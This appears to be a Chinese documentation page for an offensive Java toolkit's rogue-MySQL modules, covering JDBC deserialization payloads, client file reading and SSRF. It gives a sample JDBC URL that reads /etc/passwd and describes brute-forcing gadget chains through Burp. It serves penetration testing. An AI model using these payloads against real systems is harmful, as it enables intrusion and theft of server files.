跳到主要内容

MySQL JDBC 利用

FakeMySQLPayload

MySQL JDBC 反序列化利用姿势

FakeMySQL 模块和 JNDI 模块 的利用方式非常相似。

JNDI 通过 LDAP/RMI 参数传递 token,与后端进行匹配并返回相应的 Payload。

相比之下,FakeMySQL 则通过 MySQL JDBC 用户名传递 token 参数。

这个模块也与 JNDI 模块一样采用了相同兼容逻辑:如果 token 没有匹配到,它将默认返回最新生成的 Payload。

FakeMySQLReadPayload

MySQL JDBC 客户端文件读取、SSRF 姿势

这里支持两个传参方式,第一种是在 java chains 输入参数,然后返回一个 token,把该放入 jdbc payload 中

jdbc:mysql://127.0.0.1:3308/test?user=[TOKEN]

第二种传参方式是在 username 中设置参数,格式为:fileread_[file name]

其中 fileread_ 是固定前缀,后缀跟要读取的文件名,例如下面 JDBC 读取文件 Payload

jdbc:mysql://127.0.0.1:3308/test?user=fileread_/etc/passwd

FakeMySQLSHPayload

FakeMySQL 反序列化爆破链,一键测试常规反序列化链,提高测试效率

可放入到 Burp 中进行批量爆破测试

总体使用流程等同于 JNDI 的爆破链,可进行参考: JNDIShowHandPayload

参考